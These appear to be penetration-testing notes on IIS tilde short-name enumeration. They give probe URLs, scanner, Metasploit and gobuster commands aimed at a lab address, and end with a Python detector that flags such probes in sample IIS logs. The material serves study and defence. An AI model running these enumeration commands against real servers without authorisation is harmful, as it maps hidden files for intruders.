IIS

IIS Tilde Enumeration

IIS tilde directory enumeration is a technique used to uncover hidden files, directories, and their short file names (the 8.3 format) on some versions of Microsoft Internet Information Services (IIS) web servers. It works because the server answers differently depending on whether a guessed short-name prefix matches an existing file or directory.

Exploitation

Assuming there is a directory called SecretDocuments, its short name can be guessed one character at a time:

http://example.com/~s -> 200 OK

http://example.com/~secre -> 200 OK

Once the short name is identified, request http://example.com/secre~1/

Then try to access a file inside it, e.g. http://example.com/secre~1/somefi~1.txt

Using IIS Shortname Scanner

$ # install https://github.com/irsdl/IIS-ShortName-Scanner.git
$ java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/
$ msfconsole
msf6 > use auxiliary/scanner/http/iis_shortname_scanner

Generating Wordlist

You still need the real name: the short name on its own cannot be used to access the files, so the full name is required. The short name is only useful as a prefix for narrowing the brute force, which is what the wordlist below is built from.

$ egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt
$ gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
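From the defensive side, the probing shown above leaves a recognisable trail in the IIS logs: a burst of requests whose path segments start with "~" or contain an 8.3 short name such as secre~1. The following Python detector is an added example, not part of the original notes; it runs over constructed W3C-style log lines (date, time, c-ip, cs-method, cs-uri-stem, sc-status) and the field layout and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed IIS W3C-style log lines for this example (not real traffic):
# date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2024-03-01 09:00:00 198.51.100.7 GET /index.aspx 200
2024-03-01 09:00:01 203.0.113.9 GET /~s 200
2024-03-01 09:00:01 203.0.113.9 GET /~t 404
2024-03-01 09:00:02 203.0.113.9 GET /~se 200
2024-03-01 09:00:02 203.0.113.9 GET /~secre 200
2024-03-01 09:00:03 203.0.113.9 GET /secre~1/ 200
2024-03-01 09:00:04 203.0.113.9 GET /secre~1/somefi~1.txt 404
2024-03-01 09:00:05 203.0.113.9 GET /*~1*/.aspx 404
2024-03-01 09:00:06 198.51.100.7 GET /docs/report.pdf 200
2024-03-01 09:00:07 192.0.2.44 GET /~1 404
"""

# Two probe shapes: a path segment beginning with "~" (the guessing phase,
# e.g. /~secre) or an 8.3 short name like secre~1 or the wildcard form *~1*.
TILDE_PROBE = re.compile(r"(?:^|/)~[^/]*|[^/]*~\d[^/]*")

LOG_LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<status>\d{3})$"
)

def parse_log(text):
    """Yield one dict per well-formed line; skip blanks and #Fields-style headers."""
    for raw in text.splitlines():
        if not raw or raw.startswith("#"):
            continue
        m = LOG_LINE.match(raw)
        if m:
            yield m.groupdict()

def is_tilde_probe(uri):
    return TILDE_PROBE.search(uri) is not None

def detect_tilde_enumeration(text, threshold=3):
    """Return {client_ip: [distinct probed URIs]} for clients whose number of
    distinct tilde probes reaches the threshold; a lone stray request stays below it."""
    probes = defaultdict(list)
    for rec in parse_log(text):
        if is_tilde_probe(rec["uri"]) and rec["uri"] not in probes[rec["ip"]]:
            probes[rec["ip"]].append(rec["uri"])
    return {ip: uris for ip, uris in probes.items() if len(uris) >= threshold}

if __name__ == "__main__":
    for ip, uris in detect_tilde_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(uris)} short-name probes, e.g. {uris[:3]}")
```

Servers that legitimately serve paths like /~alice/ will also match the first pattern, so tune the regex to the environment before alerting on it.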
